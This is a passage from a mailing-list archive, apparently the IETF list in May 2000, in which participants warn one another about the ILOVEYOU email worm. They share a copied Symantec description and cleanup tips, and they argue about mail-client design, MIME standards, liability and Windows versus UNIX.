cheat such procedures? Your message is now so confused that there's no way I can answer this sensibly. Ned
Re: VIRUS WARNING music at pittsburg?
1/ i think microsoft and the alleged hacker have provived an exxcellent lesson in active networks 2/ is anyone interested in jamming at the next IETF (folk, jazz, rock, thrash, triphop etc - you know, primal scream...) - i can bring a guitar (or bass or flute or something...) but local folks would be easier on the wrists!!! j.
Re: VIRUS WARNING
Jacob, Given a choice between reducing crime via more government surveillance and reducing crime via software that doesn't do stupid things, I'd far prefer the latter. I don't know of any good reason for a mail reader to make it so easy to execute code that can have harmful side effects, but history has provided us with many examples of governments abusing their power (legitimate or otherwise) to conduct surveillance. not that this is terribly relevant to the ILOVEYOU virus...the virus is being transmitted in the clear; the US government (at least) seems perfectly knowledgable about it and ISPs appear to have been cooperating with government authorities to help track down the source. it's not as if the code is a secret, and if I believe the news reports the authorities are already very close to nabbing the culprit. (or at least, a suspect...) Keith note that the IETF policy is to not develop facilities specifically for the purpose of supporting government surveillance...this does not mean that IETF is actively trying to prevent governments from conducting surveillance, either using facilities developed for other purposes, or facilities not developed by IETF. it just means that IETF has decided to concentrate its energies in other areas.
Re: VIRUS WARNING
but sooner or later folks are going to be held liable for poor engineering or poor implementation of networking software, just like folks today can be held liable for poor engineering or implementation of bridges or buildings. I don't see how, as long as the software manufacturers ship the software with legal disclaimers, e.g. "We are not responsible for damages ..." sooner or later that phrase will be recognized as less valuable than bovine feces. Keith
Re: VIRUS WARNING
Michael: I could not agree more, we have a few (possibly .. 3) virus that have infect *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionaly fire up the other side to read a awful .doc or .ppt file... I simply refuse to allow our IT dept to have there way with me and infect me with the worst virus... that other O/S :-) R "Michael H. Warfield" wrote: On Thu, May 04, 2000 at 11:13:03PM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 11:11:50 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Hmm.. the Morris worm of 1988. What are the other 2? Bliss? Wasn't very sophisticated and it didn't propagate very well, but it did work. It just fizzeled out because it's propagation coefficient never even came close to break even. What's the other one? Hmm.. if you count the 2 self-reproducing sample programs that came with 'gcc', no others. Or maybe there's more than 3, which is likely since I've seen at least 4 different "proof of concept" level creations... I've seen some assembly code someone was proposing on one of the development lists. One of the DOS virus writers claiming that it would work as a Linux virus. No evidence that it does anything though. I would marginally call that one a "proof of concept" or a "maybe of concept". Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it! -- Randall R. Stewart Member Technical Staff Network Architecture and Technology (NAT) 847-632-7438 fax:847-632-6733
RE: VIRUS WARNING
The goal of those who write viruses is to get attention, true? I guess they figure that writing their viruses for Windows is going to get them a lot more attention than writing for other operating systems with smaller user bases. :-) Tongue firmly in cheek -- Ian King -- DISCLAIMER: The foregoing is my personal opinion, and should not be construed as the official position of or statement by my employer. -Original Message- From: Randall Stewart [mailto:[EMAIL PROTECTED]] Sent: Friday, May 05, 2000 1:05 PM To: Michael H. Warfield Cc: [EMAIL PROTECTED]; Scot Mc Pherson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING Michael: I could not agree more, we have a few (possibly .. 3) virus that have infect *nix systems. Even more telling, look at how linux systems have NOT been infected or bothered much. I find this interesting since the code - bugs, wart, and any holes are available to any who want to look at it... Now if I take and switch the machine I am typing on over to that "other" o/s the virus scanner it has lists 100's and I mean 100's of viruses... I do understand that some of us are STUCK with that other O/S... but there are options.. I too am in theory using it.. but only when I have to... I do all my real work on the linux side and only occasionaly fire up the other side to read a awful .doc or .ppt file... I simply refuse to allow our IT dept to have there way with me and infect me with the worst virus... that other O/S :-) R [snip]
Re: VIRUS WARNING
The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
This is actually genuine for once... it's a vbscript.. On Thu, 4 May 2000, Scot Mc Pherson wrote: The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) - Linux is swift and powerful. Beware its wrath...
RE: VIRUS WARNING
Actually what happened, was I received this virus from a trusted friend who just so happens would send an e-mail to me with that sort of "literary" content to me as a joke. So as it happens it was a perfect trojan because it slipped under my defenses by being something I would normally expect. My software doesn't open attachments by default. Thus it was entirely my error. I am just glad that I didn't have any e-mail lists in my "address book" In fact to back up your statement, there are exactly 3 virii that infect UNIX based systems. Scot -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
From: [EMAIL PROTECTED] Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING) Date: Thu, 04 May 2000 10:46:33 -0400 On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) You are missing the point here, this is user friendliness, the user is allowed to do whatever he/she wants, even in others equipment with others data. ;) It does make box managment so much easier ;) Cheers, Magnus
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, May 04, 2000 at 10:46:33AM -0400, [EMAIL PROTECTED] wrote: On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) Your mailer may be able to display it as text (mine, Mutt, certainly can) but it is definitely propagating as type application/octet-stream, not text/plain. Wish we could lay that one on them, but we can't. It's also now reported to be able to propagate across IRC. -- Valdis Kletnieks Operating Systems Analyst Virginia Tech Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
RE: VIRUS WARNING
Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
Re: VIRUS WARNING
Actually what happened, was I received this virus from a trusted friend but of course you didn't receive the virus from a trusted friend; you received it from an impostor. now you know not to trust names that appear in a message header. Keith
RE: VIRUS WARNING
In addition to what has been posted by me earlier and what has been reported on Symantec's site, I have learned the following. When the virus is contracted (DONOT shut down the computer or reboot) The worm is designed to propagate fully during system startup. It should be noted that you should do a file search based on all files created or modified the day the worm was downloaded...NOTE that the timestamp is irrelevent, I found files that were created at a time when the computer was not turned on so the worm is able to create modify this info... In the registry file all references to the five files listed on your website should also be deleted (key and folder) You will find most of the references within the keys that control the system tray and startup control (Not the program folder) The Worm also creates an href for IE startup page which downloads the virus again...THis should be changed AFTER all the above has been accomplished Thw Worm also creates an HTML page LOVE-LETTER-FOR-YOU.TXT.html on your local drive which contains ActiveX scripts which redistributes the worm.. Delete this file. This worm seems to be a sort of application that creates the other files for some sort of source code that utilizes applicaitons already installed on the local drive to rewrite the worm into various forms. I believe I have wiped out the virus, but I will keep checking...One method of checking this status is the look at the mail que of your mail server and look for e-mail without controls. I have received an e-mail from someone else saying these additinal sites with information regarding ILOVEYOU, I have yet to visit them. http://www.securityfocus.com http://www.datafellows.com/v-descs/love.htm -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:35 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Brian Duddy (E-mail); Kevin Speilman (E-mail); Michael F. Young (E-mail); Perry Lewis (E-mail); Robert E Sollmann (E-mail); Roger Shepheard (E-mail) Subject: RE: VIRUS WARNING The file subject: ILOVEYOU Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs DO NOT OPEN THE ATTACHMENT. At this time very little is known about the virus. If you have opened the file, please see your network administrator for help. The following link to Symantec has info on what the file does to your system. http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html Since the webpage is too busy to access I am copying the text portions of the webpage here VBS.LoveLetter.A This is an email worm, mIRC worm, and file infector. Also known as: Category: Worm Infection length: 10307 Virus definitions: Pending Threat assessment: Damage: High Distribution: High Wildness: High Wild Number of infections: More than 1000 Number of sites: More than 10 Geographic distribution: High Threat containment: Moderate Removal: Moderate Damage Payload: Large scale e-mailing: All the addresses in Microsoft Outlook address book Degrades performance: May clog mail servers Distribution Subject of e-mail: ILOVEYOU Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs Size of attachment: 10307 Technical description: This is a preliminary writeup. The information contained within is to provide as much information as possible at this time. VBS.LoveLetter.A is an email worm, mIRC worm, and a file infector. VBS.LoveLetter.A will use Microsoft Outlook and email itself out as an attachment with the above subject line and attachment name. The body of the message will be kindly check the attached LOVELETTER coming from me. The virus will also infect files with the following extensions: vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp3, and mp2 The virus will insert the following files: MSKernel32.vbs in the Windows System directory Win32DLL.vbs in the Windows directory LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System directory WinFAT32.EXE in the Internet download directory WIN-BUGSFIX.EXE in the Internet download directory script.ini in the mIRC directory SARC recommends Administrators filter on the attachment name and Subject line immediately. This writeup will be verified and formalized within the hour. Removal: Delete found infected files. Write-up by: Eric Chien Updated: May 4, 2000 Tell a Friend about this Write-Up -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 9:27 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: VIRUS WARNING The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
RE: VIRUS WARNING
From: Lillian Komlossy [EMAIL PROTECTED] The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. The issue cannot be ignored, but it has nothing to do with UNIX. The only connection with UNIX is that UNIX comes from the old tradition in which design involved more than increasing already long lists of bullet items that people with no knowledge or interest in computers think they understand, but don't and don't care that they don't. The issue is that the Internet is not merely a big but private corporate internet such as the one in Redmond. Authentication and authorization are not the same things. That which is most convenient or "user-friendly" is not safe enough, whether it is using ActiveX to update software from AOL/Netscape or Microsoft headquarters without the informed consent of the local user, not requiring the informed local consent before running the latest dancing baby email attachment, or many other things including those that are called viruses but that don't differ significantly. Vernon Schryver[EMAIL PROTECTED]
RE: VIRUS WARNING
This discussion is a bad as the virus. Can we take it off this list and have it individually please? Mark A. Lipford -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:02 AM To: '[EMAIL PROTECTED]' Subject:RE: VIRUS WARNING Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net
RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
I don't know about deliberate inclusion of the security hole - it looks more to me like "careless". Feels like it just "was not thought to be a danger of any kind to security"... (Does the word TITANIC mean anything to you?) Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Keith Moore [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:58 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING) So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. well there's nothing illegal about violating RFCs. but it sure seems like the deliberate inclusion of a security hole in email software would be sufficient grounds for a class action lawsuit. Keith
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
On Thu, 04 May 2000 10:41:34 EDT, "Michael H. Warfield" said: Your mailer may be able to display it as text (mine, Mutt, certainly can) but it is definitely propagating as type application/octet-stream, not text/plain. Wish we could lay that one on them, but we can't. Mea Culpa - seems *MY* MUA decided to be naughty and flag it as a text/plain, so I reported it as such. I'll shut up now while I go and beat said MUA into submission and make it not lie to me anymore. Yes, the data as it was actually stored in the message store was an application/octet-stream. However, that's not much better, security-wise. (Although at least with an "application/foobar", you know that it's designed for application foobar, and can appropriately sandbox your foobar-viewer). -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
Date: Thu, 04 May 2000 10:48:12 -0400 From: "Donald E. Eastlake 3rd" [EMAIL PROTECTED] The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. You need to get with program! Having software which is a good culture medium for e-mail virus is part of the innovative new features which customers are demanding. Clearly, you need report to re-education camps to learn why it's important to let the government let companies have to freedom to innovate wonderful things like vbscript. :-) - Ted
RE: VIRUS WARNING
From: "Scot Mc Pherson" [EMAIL PROTECTED] Actually what happened, was I received this virus from a trusted friend ... I am just glad that I didn't have any e-mail lists in my "address book" That's actually an interesting bit of "social engineering" on the part of the virus writer - using the address book as a source of places to propogate to means that those people who get it are *exactly* the set of people who know you, and are thus more likely to open a random unexpected attachment... Noel
RE: VIRUS WARNING
The whole world will use what they are presented with the difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability thats holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too! On Thu, 4 May 2000, Lillian Komlossy wrote: Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
This is what happens when a software gient makes up the rules as they go along, all in the name of making the umm user err happy, Now i will spend £30.00 on anti-virus software :-) -Original Message- From: Magnus Danielson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 4:24 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING) From: [EMAIL PROTECTED] Subject: THe Value Of Following Standards... (was Re: VIRUS WARNING) Date: Thu, 04 May 2000 10:46:33 -0400 On Thu, 04 May 2000 09:27:19 EDT, Scot Mc Pherson [EMAIL PROTECTED] said: The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. Somebody didn't read RFC2046, section 2, where it talks about text/plain being *TEXT*, and application/* being *application data*. So if your e-mail software is opening it and feeding it to Visual Basic just because it's tagged .vbs even though it's a text/plain, you're violating the RFCs. I'm not pointing fingers, but ;) You are missing the point here, this is user friendliness, the user is allowed to do whatever he/she wants, even in others equipment with others data. ;) It does make box managment so much easier ;) Cheers, Magnus
Re: VIRUS WARNING
Clearly, you need report to re-education camps to learn why it's important to let the government let companies have to freedom to innovate wonderful things like vbscript. :-) not to mention gratuitous incompatibilites to Kerberos. Keith
RE: VIRUS WARNING
Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software) Jim Jim Dunn Senior Network Engineer San Francisco NOC -Original Message- From: A James Lewis [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:53 AM To: Lillian Komlossy Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING The whole world will use what they are presented with the difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability thats holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too! On Thu, 4 May 2000, Lillian Komlossy wrote: Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
the builders of the titanic didn't know that certain kinds of steel become brittle at cold temperatures. otoh, the developers of this user agent knew, or should have known, the risks of executing code of unknown origin. they have been understood for a long time. they were discussed during development of the MIME standard. the MIME specs have required content-types to document known security risks since the early 1990s. other email-borne viruses have used similar mechanisms to this one to propagte themselves. So if the users would save the virus to disk and then run it, what's the savings? If I send a naked_bunnies.exe file to a dirty joke email list, some people are going to run it no matter what warnings are given or whether or not it's zipped and uuencoded, whatever. If 20% of the people receiving a virus propagate it rather than 50%, that's probably still good enough to be significantly detrimental. You could have senders sign any executables. That might help a little, as long as the sender's machine hasn't been compromised. Austin
Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
So if the users would save the virus to disk and then run it, what's the savings? the virus doesn't propagate as quickly, nor to as many people, before it is detected and countermeasures are put in place. yes, this does make a significant difference. You could have senders sign any executables. That might help a little, as long as the sender's machine hasn't been compromised. this would also help, but we'd need a better way to verify the sender's signature than we have now. Keith
RE: VIRUS WARNING
Let's not make it political. We've all been attacked, it is pointless to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac are all great as long as somebody likes to work with them. I personally like Microsoft products, but I respect those who don't - and expect the same respect from them. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 4:18 PM To: 'A James Lewis'; 'Lillian Komlossy' Cc: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Office for Unix, Now there's a terrifying thought (please don't contaminate the purity of my unix system with that filthy windows software) Jim Jim Dunn Senior Network Engineer San Francisco NOC -Original Message- From: A James Lewis [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 11:53 AM To: Lillian Komlossy Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING The whole world will use what they are presented with the difference between Win3.1 and Win95 is far greater than the difference between Win95 and GNOME or KDE... so actually it's only software availability thats holding back IS departments the world over! If MS gets split, we could have Office for UNIX sooner rather than later too! On Thu, 4 May 2000, Lillian Komlossy wrote: Donald, The whole world will not switch over to Unix - the average user will always be more confortable with Windows unless Unix will at one point offer the same seamless user-friendliness. So it will always be a problem, one which cannot be solved by telling others not to use what they've accustomed to - and one which cannot be ignored. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 04, 2000 10:48 AM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING The whole world does not run software which is a good culture medium for email viruses. I mostly use nice old UNIX software and it would take a number of extra steps on my part for some embdedded virus to get a chance to run. If your software automatically executes stuff in attachments, you need to change your software, not develope a list of subject lines you are freightened of. Donald From: "Scot Mc Pherson" [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Date: Thu, 4 May 2000 09:27:19 -0400 Message-ID: 00cf01bfb5cc$79bc4280$[EMAIL PROTECTED] Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit X-Loop: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit The is an e-mail virus going around. The subject of the e-mail is ILOVEYOU...I suggest you delete it the moment you receive it. -Scot Mc Pherson, N2UPA -Sr. Network Analyst -ClearAccess Communications -Ph: 941.744.5757 ext. 210 -Fax: 941.744.0629 -mailto:[EMAIL PROTECTED] -http://www.clearaccess.net A. James Lewis ([EMAIL PROTECTED]) Don't throw your computers out of the windows, throw the Windows(tm) out of your computers.
Re: VIRUS WARNING
